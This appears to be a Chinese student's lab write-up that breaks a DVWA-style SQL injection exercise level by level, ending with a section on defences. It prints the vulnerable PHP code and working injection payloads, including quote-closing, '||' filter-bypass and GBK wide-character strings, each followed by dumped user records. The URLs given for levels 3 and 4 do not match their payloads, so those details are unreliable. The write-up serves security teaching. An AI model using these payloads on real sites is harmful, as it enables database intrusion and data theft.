SQL注入实验

本文详细记录了一次SQL注入实验,从安全等级1到5逐步破解的过程,包括注入方法和原理分析,展示了如何利用布尔连接符、宽字符注入等技巧绕过防护。

信息安全实验 SQL Injection


一.实验内容

1.Finish all six challenge on the website,or give the reason why the protection is unbreakable(need an experiment report ).

2(Extended work).Tell me why [input = a’ or ‘1=1’ or ‘1=1] doesn’t work on the login website in your experiment report.

二.实验过程

  • 登陆实验网页:http://202.38.79.49:8888/login.php
    登陆界面如下:
    p1
  • 尝试输入默认用户名和用户密码:
    Username: admin
    Password: admin
  • 成功登入系统!系统界面如下:
    p2
    1.设置安全等级为1:Security Level = 1.
    注入界面如下:
    p3
  • 点击右下角的View Source,查看PHP连接后台数据库的源代码:
<?php     

if(isset($_GET['Submit'])){ 

    // Retrieve data 

    $id = $_GET['id']; 

    $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id"; 
    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); 

    $num = mysql_numrows($result); 

    $i = 0; 

    while ($i < $num) { 

        $first = mysql_result($result,$i,"first_name"); 
        $last = mysql_result($result,$i,"last_name"); 

        echo '<pre>'; 
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; 
        echo '</pre>'; 

        $i++; 
    } 
} 
?>
  • 根据以上代码可知,可以利用$id变量的漏洞进行sql注入,向User ID文本框中输入查询字符串1=1 or 1=1,URL网址变成了http://202.38.79.49:8888/vulnerabilities/sqli/?id=1=1+or+1=1&Submit=Submit,获得如下数据库信息:
ID: 1=1 or 1=1
First name: admin
Surname: admin

ID: 1=1 or 1=1
First name: Gordon
Surname: Brown

ID: 1=1 or 1=1
First name: Hack
Surname: Me

ID: 1=1 or 1=1
First name: Pablo
Surname: Picasso

ID: 1=1 or 1=1
First name: Bob
Surname: Smith

Level 1注入成功。

2.设置安全等级为2:Security Level = 2.

  • 点击右下角的View Source,查看PHP连接后台数据库的源代码:
<?php     

if(isset($_GET['Submit'])){ 

    // Retrieve data 

    $id = $_GET['id']; 

    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; 
    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); 

    $num = mysql_numrows($result); 

    $i = 0; 

    while ($i < $num) { 

        $first = mysql_result($result,$i,"first_name"); 
        $last = mysql_result($result,$i,"last_name"); 

        echo '<pre>'; 
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; 
        echo '</pre>'; 

        $i++; 
    } 
} 
?>
  • 将Security Level = 2的代码与Security Level = 1的代码进行比较, 发现唯一的区 别就是1的$getid变量中是WHERE user_id = $id,而2的$getid变量中是WHERE user_id = '$id',多了单引号。于是可以将输入查询串改为abc' or '1=1,将单引号过 滤掉。URL网址变成了http://202.38.79.49:8888/vulnerabilities/sqli/?id=abc'+or+'1=1&Submit=Submit,获得如下数据库信息:
ID: abc' or '1=1
First name: admin
Surname: admin

ID: abc' or '1=1
First name: Gordon
Surname: Brown

ID: abc' or '1=1
First name: Hack
Surname: Me

ID: abc' or '1=1
First name: Pablo
Surname: Picasso

ID: abc' or '1=1
First name: Bob
Surname: Smith

Level 2注入成功。

3.设置安全等级为3:Security Level = 3.

  • 点击右下角的View Source,查看PHP连接后台数据库的源代码:
<?php     

if(isset($_GET['Submit'])){ 

    // Retrieve data 

    $id = $_GET['id']; 
    if (preg_match('/ |\'/',$id))
    {
        echo die('<pre>' . 'Contain invalid characters.' . '</pre>');
        $num = 0; 
    }
    else
    {

        $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id"; 
        $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); 

        $num = mysql_numrows($result); 
    }

        $i = 0; 

        while ($i < $num) { 

            $first = mysql_result($result,$i,"first_name"); 
            $last = mysql_result($result,$i,"last_name"); 

            echo '<pre>'; 
            echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; 
            echo '</pre>'; 

            $i++; 
        } 
} 
?>
  • 将Security Level = 3的代码与Security Level = 1和2的代码进行比较,发现3的代码多了一段正则表达式的判定if (preg_match('/ |\'/',$id)),这个正则表达式的含义是,如果$id变量中含有空格或者单引号,则输出 错误信息'Contain invalid characters.。于是我们尝试不用空格和单引号进行注入, 将输入查询串改为1||1,利用||的布尔连接符,实施注入。
  • 此时,URL网址变成了 http://202.38.79.49:8888/vulnerabilities/sqli/?id=1=1+or+1=1&Submit=Submit, 获得如下数据库信息:
ID: 1||1
First name: admin
Surname: admin

ID: 1||1
First name: Gordon
Surname: Brown

ID: 1||1
First name: Hack
Surname: Me

ID: 1||1
First name: Pablo
Surname: Picasso

ID: 1||1
First name: Bob
Surname: Smith

Level 3注入成功。

4.设置安全等级为4:Security Level = 4.

  • 点击右下角的View Source,查看PHP连接后台数据库的源代码:
<?php 

if (isset($_GET['Submit'])) { 

    // Retrieve data 

    $id = $_GET['id']; 
    $id = mysql_real_escape_string($id); 

    $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id"; 

    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); 

    $num = mysql_numrows($result); 

    $i=0; 

    while ($i < $num) { 

        $first = mysql_result($result,$i,"first_name"); 
        $last = mysql_result($result,$i,"last_name"); 

        echo '<pre>'; 
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; 
        echo '</pre>'; 

        $i++; 
    } 
} 
?>
  • 将Security Level = 4的代码与Security Level = 1的代码进行比较,发现4的代码多 了一段语句:$id = mysql_real_escape_string($id);,函数mysql_real_escape_string主要是为了数据库防注入、以及语句正确性等需要,将读写语句中的特殊字符进行转换: \x00 \n \r \ ' " \x1a,如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。但最终写入到数据库中的内容,依旧是转义前的,也就是当读出来的时候,依旧是原来转义前的内容。所以,若注入语句中不包含特殊符号,依然可以成功注入,利用和Level1中相同的语句1=1 or 1=1进行注入,此时,URL网址变成了http://202.38.79.49:8888/vulnerabilities/sqli/?id=1||1&Submit=Submit,获得如下数据库信息:
ID: 1=1 or 1=1
First name: admin
Surname: admin

ID: 1=1 or 1=1
First name: Gordon
Surname: Brown

ID: 1=1 or 1=1
First name: Hack
Surname: Me

ID: 1=1 or 1=1
First name: Pablo
Surname: Picasso

ID: 1=1 or 1=1
First name: Bob
Surname: Smith

Level 4注入成功。

5.设置安全等级为5:Security Level = 5.

  • 点击右下角的View Source,查看PHP连接后台数据库的源代码:
<?php 

if (isset($_GET['Submit'])) { 

    // Retrieve data 

    mysql_query('SET NAMES gbk');

    $id = $_GET['id']; 
    $id = mysql_real_escape_string($id); 

    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; 
    echo '<a>' . $getid . '</a>';

    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); 

    $num = mysql_numrows($result); 

    $i=0; 

    while ($i < $num) { 

        $first = mysql_result($result,$i,"first_name"); 
        $last = mysql_result($result,$i,"last_name"); 

        echo '<pre>'; 
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; 
        echo '</pre>'; 

        $i++; 
    } 
} 
?>
  • 将Security Level = 5的代码与Security Level = 4的代码进行比较,发现5的代码多 了一段语句:mysql_query('SET NAMES gbk');,且变量$getid中的$id变量两边和Level 2一样是有单引号的。以上语句将编码设置为gbk,我们可以在此利用宽字符注入的方式来获取数据库内容。设计$id值为abc%df%27%20or%201=1%20%23,并修改url地址为http://202.38.79.49:8888/vulnerabilities/sqli/?id=abc%df%27%20or%201=1%20%23&Submit=Submit,获得如下数据库信息:
    p4
    以上注入的原理是利用了%df和经过转义函数mysql_real_escape_string()编码之后带入了字符’\’的编码%5c形成宽字符编码%df%5c,成功地吃掉了%5c,得以让%27的单引号闭合成功。

    Level 5注入成功。


6.设置安全等级为Security Level = 6.
  • 点击右下角的View Source,查看PHP连接后台数据库的源代码:
<?php     

if (isset($_GET['Submit'])) { 

    // Retrieve data 

    $id = $_GET['id']; 
    $id = stripslashes($id); 
    $id = mysql_real_escape_string($id); 

    if (is_numeric($id)){ 

        $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; 
        $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); 

        $num = mysql_numrows($result); 

        $i=0; 

        while ($i < $num) { 

            $first = mysql_result($result,$i,"first_name"); 
            $last = mysql_result($result,$i,"last_name"); 

            echo '<pre>'; 
            echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; 
            echo '</pre>'; 

            $i++; 
        } 
    } 
} 
?>
  • 将Security Level = 6的代码与Security Level = 4的代码进行比较,发现6的代码多 了一段语句:$id = stripslashes($id);,stripslashes() 函数删除由mysql_real_escape_string() 函数添加的反斜杠,如果有两个连续的反斜线 ,则只去掉一个。
  • 这里为什么要有这个操作呢?这是由于在high级别下,PHP的magic_quotes_gpc被自动设为on,magic_quotes_gpc被称为魔术引号,开启它之后,可以对所有的GET、POST和COOKIE传值的数据自动运行addslashes()函数,所以这里才要使用stripslashes()函数去除。magic_quotes_gpc功能在PHP5.3.0中已经废弃并且在5.4.0中已经移除了,这也是为什么在DVWA中一直强调使用mysql_real_escape_string()函数进行过滤的原因吧。
    另外还可以发现,在执行查询之前,使用了if语句进行判断,判断的条件是一个is_numeric()函数,也就是判断用户输入的数据是否是数字型,只要不是数字型就一概报错,这样那些and、or、select等语句都无法执行了。
    最后在具体执行查询时,还要求$id是字符型。经过这样重重防护,这样页面就很难注入了。
  • 所以Level 6的后台代码在本实验中难以实施注入。
  • (补充:试试将1 or 1’语句转换为16进制0x31206f722031带入数据库进行查询,或许有效)。
### SQL 注入实验教程与防御方法 #### 实验教程 SQL注入实验旨在帮助学习者了解SQL注入攻击的工作原理以及如何利用工具检测系统中的漏洞。通过此实验,可以掌握常用的端口和漏洞扫描工具,并提升对SQL注入漏洞危害的认识[^1]。 以下是SQL注入实验的核心内容: - **目标检测**:使用端口和漏洞扫描工具(如Nmap、OpenVAS等)对目标系统进行扫描,发现开放的服务和可能存在的漏洞。 - **SQL注入测试**:尝试构造恶意的SQL语句,以验证目标系统是否存在SQL注入漏洞。例如,通过输入单引号 `'` 或其他特殊字符来观察系统的响应行为。 - **分析结果**:记录并分析实验过程中发现的漏洞,明确其成因及潜在危害。 #### 防御方法 为了有效防御SQL注入攻击,可以从以下几个方面入手: 1. **参数化查询** 使用参数化查询或预编译语句,确保用户输入的内容不会被直接解析为SQL代码。例如,在Python中可以使用以下代码实现安全查询: ```python import sqlite3 conn = sqlite3.connect('example.db') cursor = conn.cursor() username = "admin" password = "password123" # 参数化查询 cursor.execute("SELECT * FROM users WHERE username=? AND password=?", (username, password)) results = cursor.fetchall() ``` 2. **输入验证** 对用户输入的数据进行严格的验证和过滤,确保只允许合法的输入。例如,如果应用程序只需要用户输入数字,可以使用以下代码进行白名单过滤[^3]: ```python if not username.isdigit(): raise ValueError('Invalid username') ``` 3. **最小权限原则** 确保数据库用户的权限设置合理,仅授予其完成任务所需的最低权限。例如,避免使用具有管理员权限的账户连接数据库。 4. **空格绕过防御** 在某些情况下,攻击者可能通过替换空格来绕过简单的过滤规则。可以通过正则表达式或其他方法检测并阻止这些变种输入[^2]。 5. **错误信息控制** 避免在生产环境中显示详细的错误信息,防止攻击者利用这些信息推测数据库结构。 6. **定期更新与审计** 定期更新数据库管理系统及相关软件版本,修补已知漏洞。同时,对应用程序和数据库进行安全审计,及时发现并修复潜在问题。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值